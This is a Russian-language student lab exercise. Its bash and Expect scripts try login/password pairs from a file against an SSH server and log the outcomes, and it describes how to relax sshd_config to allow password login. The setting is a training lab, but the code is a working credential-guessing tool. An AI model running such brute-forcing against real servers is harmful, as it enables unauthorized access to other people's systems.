# Задание № 5 
# Написать скрипт, который занимается подбором логина и пароля к ssh. При этом логины и пароли хранятся в отдельных файлах. Удачные и неудачные попытки записываются в файл.

# Необходимо произвести изменения в файле /etc/ssh/sshd_config
# PasswordAuthentication yes — разрешить применение паролей
# #PasswordAuthentication no — закомментировать строку запрещающую пароли
# #PubkeyAuthentication yes — закомментировать “вход с помощью pubkey”
# Перезапустить процесс sshd: systemctl restart sshd
# Проверить статус процесса sshd: systemctl status sshd

#В выполнении задания участвуют четыре файла:
# z5.sh — запускает, наполняет и визуализирует содержимое других файлов.
# z5.ex — на языке Expect — вводит пароль получив приглашению от ssh сервера.
# z5p.txt — содержит строки логин, пароль используемые в цикле.
# z5.l0g — содержит результат работы z5.sh и z5.ex.
# Для организации лабораторного стенда использованы две виртуальных машины:
# centos8 — ssh клиент
# sshserver — ssh сервер 
# На виртуальной машине, выполняющей роль ssh сервера, в файле /etc/ssh/sshd_config, 
# разрешен вход по паролю, а  количество попыток ввода пароля сокращено до одной.
# ssh сервер доступен для проверки практической работы по адресу 84.201.166.24.

# вывод содержимого z5.sh  
#!/bin/bash #запускает bash и передаёт в качестве параметра имя файла — z5.sh
z5log="/home/makuznet/z5.log" #переменная — путь к файлу z5.log
if [ -f "$z5log" ]; then #если z5.log существует, тогда
rm $z5log #удалить z5.log
fi #окончание оператора условия
file="/home/makuznet/z5p.txt" #переменная — путь к файлу z5p.txt
while read -r f1 f2 #прочесть по-словно, присвоив каждое слово переменной
do
# вывести используемую пару логин, пароль в z5.log;
# запустить z5.ex с аргументами: логин, пароль и направить вывод в файл
#конструкция expect -c “команда“ не заработала (centOS 8)
# подождать шесть секунд (возможно, лишняя команда из-за отсутствия опыта)
echo $'\n'"$f1 $f2" >> z5.log; ./z5.ex "$f1" "$f2" >> z5.log; sleep 6
done < "$file" #(непонятно, почему именно здесь) читать строки из файла z5.log
echo $'\n' #немного воздуха для удобочитаемости вывода z5.log 
cat z5.log #вывести на печать результат работы


# вывод содержимого z5.ex
#!/usr/bin/expect -f 
set z5l [lindex $argv 0] #присвоить 1-й аргумент (логин) переменной z5l
set z5p [lindex $argv 1] #присвоить 2-й аргумент (пароль) переменной z5p
spawn ssh 192.168.1.5 -l $z5l #запустить команду ssh, -l — логин
expect "password:" #ждать, когда ssh сервер запросит пароль 
send "$z5p\r" #ввести пароль и имитировать нажатие клавиши ввод — \r
expect eof #ожидать ответ от ssh сервера
exit #завершить ssh сессию и закончить работу Expect — завершить процесс Expect

# вывод содержимого z5p.txt
# login1 Passwd1 #логин пароль (некорректная пара)
# login2 Passwd2 #логин пароль (некорректная пара)
# login3 Passwd3 #логин пароль (корректная пара)